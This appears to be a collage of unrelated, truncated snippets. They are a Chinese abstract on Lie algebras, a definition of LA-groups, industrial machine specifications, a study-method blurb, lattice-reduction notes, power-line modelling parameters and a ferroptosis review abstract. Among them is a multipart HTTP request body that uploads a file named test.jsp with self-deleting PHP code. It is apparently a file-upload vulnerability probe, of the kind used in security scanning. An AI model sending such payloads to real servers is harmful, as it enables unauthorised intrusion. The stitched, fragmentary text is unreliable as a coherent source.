文章确定了filiform李代数W6的自同构群,确定了以W6为nil-根基的可解李代数及其唯一性,并且证明了这类可解李代数没有非平凡(即非常数)不变量。 2. A finite p-group G is called LA-group, if the order of G divides the order of the automorphism group of G. 称有限p-群G是LA-群,如果群G的阶...
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Model NO. PQFB Control System Fully Automatic Customized Customized, Customized Material Aluminum Alloy, Stainless Steel, Titanium Alloy Type Preparation Machinery Finished Dosage Form Liquid Precision Precision Computerized Computerized Condition New Warranty 1 Year Volt...
body: "--e64bdf16c554bbc109cecef6451c26a4\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo \"{{r1}}\"; unlink(__FILE__); ?>\r\n--e64bdf16c554bbc109cecef6451c26a4--\r\n\r\n" ...
Studying is an integral feature of learning. Myriad strategies are available for making the act of studying academic textbooks more effective than simply opening the volume and reading the next chapter. PQ3R is a streamlined study method that aids the learner in subject matter mastery, and ...
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Lattice ConstructionThe coefficient vectors of shift polynomials with upper boundsgi(X1x1,…,Xnxn)are converted into row vectors to form a lattice basis matrix. The LLL algorithm is then employed to reduce this lattice, producing the first few reduced vectors. ...
y: shunt admittance matrix of the linepqin per unit length; B: eigenvector of (yz); γ: vector consisting ofγjthat is the square root of thejtheigenvalue of (yz). lpr: length of the line segmentpr. Similarly, the parameters of the equivalent PI model of line segmentqrcan be derive...
a unique form of programmed cell death (PCD) distinct from apoptosis, necrosis, and others, has emerged as a key area of interest. However, comprehensive reviews on how natural products influence ferroptosis in respiratory diseases are lacking. This review will explore the therapeutic potential and...
Packaging Form Horizontal Four-Side Sealing Packing Material CPP,PE,BOPP CPP Film,PE Film,BOPP Film Packing Length 50mm-240mm Packing Width 40mm -240mm Maximum Packing Dimensions L140mmx W110mm Packing Speed 60-120 Bags/Minute Total Power 2.8kw P...